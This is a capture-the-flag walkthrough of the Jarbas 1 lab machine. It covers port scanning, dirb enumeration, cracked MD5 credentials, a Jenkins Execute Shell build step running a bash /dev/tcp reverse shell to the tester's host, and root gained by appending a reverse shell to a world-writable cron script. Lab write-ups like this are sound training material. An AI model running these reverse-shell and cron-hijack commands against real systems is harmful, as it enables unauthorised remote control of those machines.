• VM: Jarbas 1
  • Goal: Obtain root shell
  • Approach: solve without automated exploitation tools

Target Discovery

nmap -sn 192.168.172.200-254
target discovery
Our target: 192.168.172.238

Port Scanning

nmap -p- -A 192.168.172.238
port scanning
  • Port 22: OpenSSH 7.4
  • Port 80: Apache httpd 2.4.6
  • Port 3306: mysql (MariaDB)
  • port 8080: http (Jetty 9.4.z-SNAPSHOT)

Enumeration

First browse through the main website which found nothing of interests. All links are pointing to web.archive.org. robots.txt does not have any hidden directories.

homepage at port 80

Next look at the webserver at port 8080. It’s running Jenkins version 2.113 and requires login before you can do anything.

I tried some SQL injection techniques but looks like the login is not vulnerable to SQL injection.

I then checked the mysql connection to port 3306 but connection is not allowed.

test mysql connection

Nothing so far. Then I run dirb and nikto against both web servers hopefully found something interestings. But unfortunately there’s no additional information from these scans.

Oh well, checked all ports without finding anything useful. I then proceed to look for any vulnerabilities against Apache 2.4.6, Jetty 9.4.z & Jenkins 2.113 using searchsploit and google. Tried several exploits to no availability.

Kinda got stuck. I went back to probe on the web servers to see if I overlooked something. Finally, got some extra information using dirb with -X flag.

dirb http://192.168.172.238 -X .php,.htm,.html

Exploitation

Check out access.html and sure I do found some interesting information.

password hashes

All right. Looks like we get some usernames & password hashes. It’s 32 hex characters so looks like MD5 hashes. We found the passwords using online website md5decrypt.net.

  • tiago: italia99
  • trindade: marianna
  • eder: vipsu

Nice, 3 passwords to use. First thing frist, try them on ssh port 22 to see if I’m lucky. Sure not. Then I proceed to try the usernames/passwords on website at port 8080. And eder/vipsu allows me to log in.

Jenkins logged in

Jenkins is new to me so I browse around to see what’s available, particularly if I can upload files and execute them. When I look at Manage Jenkins > Configure System, there’s a setting for Shell executable. Seems like a good hint that I can execute some shell commands.

shell executable

So I googled and researched more about Jenkins. Sure enough, I found out that the build process allows some shell execution. So I can make use of that to run a reverse shell.

  • click New Item
  • type any name at Enter an item name
  • select Freestyle project
  • click OK

It will create a new project and show project screen:

  • scroll down to Build section
  • click Add build step > Execute Shell
  • enter command: /bin/bash -i >& /dev/tcp/192.168.172.110/4444 0>&1
  • click Save

Note 192.168.172.110 is my kali box. Also, the target system does not have Netcat. Therefore, I am using bash reverse shell here. Now it’s time to get the reverse shell

  • at kali box: run nc -lp 4444
  • at browser: click Build Now

Boom! First foot in. The shell is a little hard to use as it will echo whatever characters I typed. But still got in, as user jenkins.

limited shell

Privilege Escalation

Next step is to become root. I started looking around the system locating possible method of privilege escalation. sudo doesn’t work. no more passwords lying around. But crontab gave me the answer:

crontab

A cron job runs every 5 minutes is executing /etc/script/CleaningScript.sh as root. And /etc/script/CleaningScript.sh is world writable. Awesome.

All I need is to run another reverse shell in the CleaningScript.sh

  • at kali box: start another Terminal
  • at kali box: nc -lp 4443
  • at limited shell: echo ” /bin/bash -i >& /dev/tcp/192.168.172.110/4443 0>&1 ” >> /etc/script/CleaningScript.sh
modify cron job

Once the reverse shell command is in the script, all we need is wait for a few minutes.

root shell

Capture the flag

captured the flag

Takeaway for me: use -X flag when doing dirb scan

Thank you Author Tiago Tavares for the box Jarbas: 1

Leave a Reply

Close Menu